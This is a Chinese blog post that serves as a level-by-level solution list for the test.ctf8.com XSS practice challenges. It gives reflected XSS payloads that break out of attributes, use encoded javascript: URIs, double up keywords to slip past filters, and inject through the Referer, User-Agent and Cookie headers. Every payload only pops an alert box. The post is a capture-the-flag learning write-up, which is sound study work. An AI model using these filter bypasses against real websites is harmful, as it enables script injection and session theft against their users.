CTF8-XSS闯关 知识点:XSS,JavaScript

最新推荐文章于 2024-02-19 10:13:57 发布
最新推荐文章于 2024-02-19 10:13:57 发布
阅读量843 收藏 3
点赞数 3
分类专栏: webctf 文章标签: xss html web javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119384648
版权

前言

今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!!

大佬博客:
xss小游戏全通关-答案
test.ctf8 xss注入解题记录
Web安全测试学习笔记 - XSS靶场 - test.ctf8.com

HTML实体字符转换
在线编码网站

解题payload:

level1:?name=<script>alert(1);</script>
level2:?keyword=" οnclick=“alert(1);&submit=搜索
level3:?keyword=’ οnfοcus='alert(1);&submit=搜索
level4:?keyword=” οnclick=“alert(1);&submit=搜索
level5:?keyword=”> <a href=javascript:alert(1);><"&submit=搜索
level6:?keyword=">+<Script>alert(1)%3B<%2Fscript> <&submit=搜索
level7:?keyword="><sscriptcript>alert(1)%3B<%2Fsscriptcript>’&submit=搜索
level8:

?keyword=%26%23x6A%3B%26%23x61%3B%26%23x76%3B%26%23x61%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%3Aalert(1)%3B&submit=添加友情链接
(&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1);)

level9:

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1); //http://
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:http:// %0d alert(1);

level10:?keyword=well done!&t_sort=" type=“text” οnmοuseοver=“alert(1);”
level11:使用burpsuit来referer注入:referer: " type=“text” οnmοuseοver=“alert(1);”
level12:使用burpsuit来user-agent注入:user-agent: " type=“text” οnmοuseοver=“alert(1);”
level13:使用burpsuit来cookie注入:cookie: " type=“text” οnmοuseοver=“alert(1);”
level14:网站有问题
level15:同样有问题。。。
level16:?keyword=<img src=3 οnerrοr=alert(1);>测试不出来
level17:?arg01=a&arg02=b" οnclick=alert(1);或者= οnmοuseοver=alert(1);测试不出来
level18:?arg01=a&arg02=b" οnclick=alert(1);或者= οnmοuseοver=alert(1);测试不出来
level19:flash xss测试不出来
level20:flash xss 测试不出来

知识点

标签#

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png οnmοuseοver=alert(1) width=100% heigth=100%>

<embed src=son.html οnmοuseοver=alert(1) width=100% heigth=100%>

Sakura-501
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hack the LAMPSecurity: CTF8 (CTF Challenge)
墙角睡大觉的专栏
07-30 1667
欢迎来到boot2root CTF挑战“LAMPSecurity:CTF8”由madirsh2600上传到vulnhub。因为,有一个主题,你需要获取flag以完成挑战,下载地址。 https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ 根据作者描述,该漏洞靶机环境有很多种技术可以获得root权限。但这中间并没有利用开发/缓冲区溢出。因此,根据我们的...
CTF-8 靶场夺旗
猎荒者
02-23 2129
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) CTF-8 虚拟机 NAT 网络连接 1. 主机发现 fping -asg 10.10.16.0/24 访问靶机 http://10.10.16.138 查看源代码,发现 flag 2. 端口扫描 nmap -A -v -s...
1. LAMPSecurity-CTF8靶机复现
Sam5ara的博客
12-05 1895
vulnhub
ctf8 vulnhub靶场
weixin_62621015的博客
03-08 390
ctf8 vulnhub靶场; 这个靶场对我一个初学者来说有点复杂 :-(
CTF-08
渗透笔记
01-19 404
题目说明:pyscript 1.打开链接后,界面如图所示,提示要输入密码并提交 2.重新访问首页,并对其抓包–>send to repeater–>go 在响应头中得到Ciphertext 在响应内容中得到一些题目提示 3.根据题目说明,这道题就是写python脚本 import hashlib import requests import re def sha1(d
CTF学习-web解题思路
菜鸟-传奇
08-27 8571
CTF学习-web题思路 持续更新 基础篇 1.直接查看源代码 2.修改或添加HTTP请求头 常见的有: Referer来源伪造 X-Forwarded-For:ip伪造 User-Agent:用户代理(就是用什么浏览器什么的) //.net的版本修改,后面添加,如版本9 .NET CLR 9 Accept-Language:语言 Cookie的修改 3.查看HTTP请求头或响应头...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
ctf-writeups:CTF撰写
05-23
对于这道题目,我们可能涉及到的知识点主要集中在JavaScript上,因为它是Web开发中的主要脚本语言,常用于构建交互式网页。以下是对JavaScript相关知识点的详细讲解: 1. **DOM操作**:JavaScript可以用来操作HTML...
CTFWEBchallenge:CTF-WEB-challs的集合主要用于审查目的
04-27
在**CTFWEBchallenge-master** 中,你可以期待看到以下类型的挑战和相关知识点: 1. **基础Web漏洞**:例如SQL注入,其中攻击者通过输入恶意SQL语句来获取、修改或删除数据库信息;文件包含漏洞,使得攻击者能够...
CTF-WEB入门DOC-2019版1
08-03
以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取分数。对于参与者来说,CTF既是娱乐方式,也是提升技能的途径。如果你打算将...
Hackzone-tunisia-CTF:网站 CTF php + mysql + bootstrap
06-02
下面将详细介绍这三个关键领域的相关知识点。 首先,PHP是一种广泛使用的开源服务器端脚本语言,尤其适合用于Web开发。PHP嵌入到HTML代码中,允许动态内容生成。在CTF挑战中,可能涉及的PHP知识点包括但不限于: 1...
test.ctf8(XSS挑战之旅)解题记录
Dexret的博客
12-03 3078
xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc')</script> level2 该题通过查看网页源码可以看出,该题将我们输入得内容插入到value标签中 那么我们可以通过在输入得内容前加入">去闭合value标签成功弹窗 payload "><script>alert(1)&lt..
ctf和DVWA靶场
whisper921的博客
01-15 2850
CTF之XSS浅谈(xsslabs)
glass_york的博客
10-07 592
主要针对XSS入门和XSSLABS前7关挑战
DVWA全级别通关教程
最新发布
dzqxwzoe的博客
02-19 1056
暴力破解或称为穷举法,是一种针对于密码的破译方法,即将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。理论上利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人辅以字典来缩小密码组合的范围。
CTF-Web-XSS
beihai2013
02-03 742
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
CTF学习笔记——XSS攻击
Obs_cure的博客
08-02 9544
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。[1]百度百科 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,与之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4927
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
LAMPSECURITY: CTF8-20220522
32bin的博客
05-23 4832
LAMPSECURITY: CTF8 About Release Back to the Top Name: LAMPSecurity: CTF8 Date release: 3 Jun 2013 Author: madirish2600 Series: LAMPSecurity Web page: http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/CTF8/ Download Back to the Top P
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值